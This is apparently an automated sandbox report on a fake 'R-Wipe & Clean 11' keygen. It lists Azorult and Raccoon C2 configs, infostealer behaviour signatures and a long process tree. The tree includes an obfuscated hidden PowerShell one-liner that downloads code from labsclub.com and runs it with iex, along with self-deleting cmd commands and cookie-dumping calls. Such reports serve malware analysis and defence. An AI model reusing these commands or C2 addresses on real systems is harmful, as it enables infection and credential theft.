Resubmissions

06-10-2022 21:06

221006-zxrwaaaga6 10

13-04-2021 12:47

210413-myxlaxh4ta 10

12-04-2021 13:54

210412-6sz4v79f2x 10

Analysis

  • max time kernel
    206s
  • max time network
    394s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-04-2021 13:54

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

a6bfe7e504db71e25642b830fd9b2c4366cf882a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 54 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 54 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2740
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:1488
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2720
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2436
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1860
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1392
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1360
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1172
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1072
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                    PID:860
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://keygenit.com/d/3e16ccf432109nspn247.html
                    1⤵
                    • Modifies Internet Explorer Phishing Filter
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:1808
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1808 CREDAT:82945 /prefetch:2
                      2⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:1128
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:992
                    • C:\Windows\System32\rundll32.exe
                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      1⤵
                        PID:1132
                      • C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_serial_key_gen.zip\R_wipe_clean_11_serial_key_gen.exe
                        "C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_serial_key_gen.zip\R_wipe_clean_11_serial_key_gen.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1400
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1568
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                            keygen-pr.exe -p83fsase3Ge
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2392
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1444
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                5⤵
                                  PID:1324
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                              keygen-step-1.exe
                              3⤵
                              • Executes dropped EXE
                              PID:928
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                              keygen-step-2.exe
                              3⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              • Suspicious use of WriteProcessMemory
                              PID:3672
                              • C:\Users\Admin\AppData\Roaming\54E2.tmp.exe
                                "C:\Users\Admin\AppData\Roaming\54E2.tmp.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2356
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\54E2.tmp.exe"
                                  5⤵
                                    PID:6264
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:5396
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2132
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    5⤵
                                    • Runs ping.exe
                                    PID:2496
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                keygen-step-3.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3024
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3960
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 1.1.1.1 -n 1 -w 3000
                                    5⤵
                                    • Runs ping.exe
                                    PID:1216
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                keygen-step-4.exe
                                3⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of WriteProcessMemory
                                PID:1416
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:3392
                                  • C:\Users\Admin\AppData\Local\Temp\S5DK2EW3DR\multitimer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\S5DK2EW3DR\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                    5⤵
                                    • Executes dropped EXE
                                    • Maps connected drives based on registry
                                    • Drops file in Windows directory
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1640
                                    • C:\Users\Admin\AppData\Local\Temp\S5DK2EW3DR\multitimer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\S5DK2EW3DR\multitimer.exe" 1 3.1618235838.607451be305c8 101
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4992
                                      • C:\Users\Admin\AppData\Local\Temp\S5DK2EW3DR\multitimer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\S5DK2EW3DR\multitimer.exe" 2 3.1618235838.607451be305c8
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks for any installed AV software in registry
                                        PID:5056
                                        • C:\Users\Admin\AppData\Local\Temp\fzevhjlu5mn\ro34fooasc3.exe
                                          "C:\Users\Admin\AppData\Local\Temp\fzevhjlu5mn\ro34fooasc3.exe" /VERYSILENT
                                          8⤵
                                          • Executes dropped EXE
                                          PID:680
                                          • C:\Users\Admin\AppData\Local\Temp\is-7T90N.tmp\ro34fooasc3.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-7T90N.tmp\ro34fooasc3.tmp" /SL5="$20412,140785,56832,C:\Users\Admin\AppData\Local\Temp\fzevhjlu5mn\ro34fooasc3.exe" /VERYSILENT
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4512
                                            • C:\Users\Admin\AppData\Local\Temp\is-GH9QU.tmp\apipostback.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-GH9QU.tmp\apipostback.exe" adan adan
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5560
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\DVRtzFzay.dll"
                                                11⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:5196
                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"
                                                  12⤵
                                                  • Executes dropped EXE
                                                  PID:4472
                                                  • C:\Windows\system32\WerFault.exe
                                                    C:\Windows\system32\WerFault.exe -u -p 4472 -s 624
                                                    13⤵
                                                    • Program crash
                                                    PID:6352
                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe
                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe"
                                                  12⤵
                                                  • Executes dropped EXE
                                                  PID:3504
                                                  • C:\Users\Admin\AppData\Local\Temp\1668172733.exe
                                                    C:\Users\Admin\AppData\Local\Temp\1668172733.exe
                                                    13⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4820
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      14⤵
                                                        PID:7320
                                                    • C:\Users\Admin\AppData\Local\Temp\2142710535.exe
                                                      C:\Users\Admin\AppData\Local\Temp\2142710535.exe
                                                      13⤵
                                                        PID:7796
                                                        • C:\Users\Admin\AppData\Local\Temp\2142710535.exe
                                                          "{path}"
                                                          14⤵
                                                            PID:7540
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe & exit
                                                          13⤵
                                                            PID:7956
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 0
                                                              14⤵
                                                              • Runs ping.exe
                                                              PID:5800
                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                          regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\DVRtzFzay.dll"
                                                          12⤵
                                                          • Loads dropped DLL
                                                          PID:6536
                                                          • C:\Windows\system32\regsvr32.exe
                                                            /s "C:\Users\Admin\AppData\Local\Temp\DVRtzFzay.dll"
                                                            13⤵
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:6560
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\DVRtzFzay.dllWx5SFWEww.dll"
                                                        11⤵
                                                          PID:7376
                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\DVRtzFzay.dllWx5SFWEww.dll"
                                                            12⤵
                                                              PID:7888
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                            11⤵
                                                              PID:8712
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                12⤵
                                                                  PID:8980
                                                        • C:\Users\Admin\AppData\Local\Temp\ufh034ds23t\KiffApp1.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\ufh034ds23t\KiffApp1.exe"
                                                          8⤵
                                                            PID:5008
                                                          • C:\Users\Admin\AppData\Local\Temp\crogncj2ads\IBInstaller_97039.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\crogncj2ads\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4708
                                                            • C:\Users\Admin\AppData\Local\Temp\is-QTSSP.tmp\IBInstaller_97039.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-QTSSP.tmp\IBInstaller_97039.tmp" /SL5="$20498,10078909,721408,C:\Users\Admin\AppData\Local\Temp\crogncj2ads\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5296
                                                              • C:\Users\Admin\AppData\Local\Temp\is-4NIF6.tmp\{app}\vdi_compiler.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-4NIF6.tmp\{app}\vdi_compiler"
                                                                10⤵
                                                                • Executes dropped EXE
                                                                PID:5680
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-4NIF6.tmp\{app}\vdi_compiler.exe"
                                                                  11⤵
                                                                    PID:4692
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping localhost -n 4
                                                                      12⤵
                                                                      • Runs ping.exe
                                                                      PID:4176
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                  10⤵
                                                                  • Checks computer location settings
                                                                  PID:5596
                                                            • C:\Users\Admin\AppData\Local\Temp\gadcij2xela\vpn.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\gadcij2xela\vpn.exe" /silent /subid=482
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5156
                                                              • C:\Users\Admin\AppData\Local\Temp\is-LURCO.tmp\vpn.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-LURCO.tmp\vpn.tmp" /SL5="$3049A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\gadcij2xela\vpn.exe" /silent /subid=482
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                • Modifies system certificate store
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:5280
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                  10⤵
                                                                    PID:5568
                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                      tapinstall.exe remove tap0901
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      PID:3260
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                    10⤵
                                                                      PID:6628
                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                        11⤵
                                                                          PID:7572
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                        10⤵
                                                                          PID:6188
                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                          10⤵
                                                                            PID:4380
                                                                      • C:\Users\Admin\AppData\Local\Temp\ncbbavgublx\app.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\ncbbavgublx\app.exe" /8-23
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:5140
                                                                        • C:\Users\Admin\AppData\Local\Temp\ncbbavgublx\app.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\ncbbavgublx\app.exe" /8-23
                                                                          9⤵
                                                                            PID:8208
                                                                        • C:\Users\Admin\AppData\Local\Temp\23pshm4wsud\Setup3310.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\23pshm4wsud\Setup3310.exe" /Verysilent /subid=577
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:3744
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CCEIC.tmp\Setup3310.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CCEIC.tmp\Setup3310.tmp" /SL5="$20494,138429,56832,C:\Users\Admin\AppData\Local\Temp\23pshm4wsud\Setup3310.exe" /Verysilent /subid=577
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:5252
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-EE831.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-EE831.tmp\Setup.exe" /Verysilent
                                                                              10⤵
                                                                                PID:5196
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  PID:5272
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6924
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:7052
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:584
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                    12⤵
                                                                                      PID:7620
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im RunWW.exe /f
                                                                                        13⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:7968
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        13⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:6268
                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                                    11⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5792
                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                                    11⤵
                                                                                      PID:1240
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                        12⤵
                                                                                          PID:4476
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                            13⤵
                                                                                            • Loads dropped DLL
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:6612
                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                                        11⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4504
                                                                                        • C:\Users\Admin\AppData\Local\Temp\N5T7GZSZVZ\multitimer.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\N5T7GZSZVZ\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                                          12⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Windows directory
                                                                                          PID:4620
                                                                                          • C:\Users\Admin\AppData\Local\Temp\N5T7GZSZVZ\multitimer.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\N5T7GZSZVZ\multitimer.exe" 1 3.1618235874.607451e2221b6 103
                                                                                            13⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:5008
                                                                                            • C:\Users\Admin\AppData\Local\Temp\N5T7GZSZVZ\multitimer.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\N5T7GZSZVZ\multitimer.exe" 2 3.1618235874.607451e2221b6
                                                                                              14⤵
                                                                                                PID:5580
                                                                                                • C:\Users\Admin\AppData\Local\Temp\53ivpfonghb\vpn.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\53ivpfonghb\vpn.exe" /silent /subid=482
                                                                                                  15⤵
                                                                                                    PID:5932
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-VPT9H.tmp\vpn.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-VPT9H.tmp\vpn.tmp" /SL5="$5076E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\53ivpfonghb\vpn.exe" /silent /subid=482
                                                                                                      16⤵
                                                                                                        PID:8268
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xhlnky0ysua\app.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\xhlnky0ysua\app.exe" /8-23
                                                                                                      15⤵
                                                                                                        PID:4000
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\xhlnky0ysua\app.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\xhlnky0ysua\app.exe" /8-23
                                                                                                          16⤵
                                                                                                            PID:6260
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4mtzhigxxyy\Setup3310.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4mtzhigxxyy\Setup3310.exe" /Verysilent /subid=577
                                                                                                          15⤵
                                                                                                            PID:6852
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-GCAJE.tmp\Setup3310.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-GCAJE.tmp\Setup3310.tmp" /SL5="$A02B4,138429,56832,C:\Users\Admin\AppData\Local\Temp\4mtzhigxxyy\Setup3310.exe" /Verysilent /subid=577
                                                                                                              16⤵
                                                                                                                PID:8232
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-E0QAV.tmp\Setup.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-E0QAV.tmp\Setup.exe" /Verysilent
                                                                                                                  17⤵
                                                                                                                    PID:8268
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4f5tzsb5nnk\setup_10.2_us3.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\4f5tzsb5nnk\setup_10.2_us3.exe" /silent
                                                                                                                15⤵
                                                                                                                  PID:8312
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\setups.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\setups.exe" ll
                                                                                                            12⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5184
